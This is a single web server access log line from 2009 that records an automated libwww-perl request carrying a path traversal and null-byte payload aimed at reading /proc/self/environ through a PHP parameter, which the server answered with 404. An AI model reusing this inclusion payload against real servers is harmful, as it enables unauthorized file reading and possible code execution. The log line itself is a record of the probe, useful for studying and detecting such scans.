69.162.94.221 - - [23/Sep/2009:22:58:54 -0500] "GET /logs/access_log.1239926400//index.php?meio.php=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
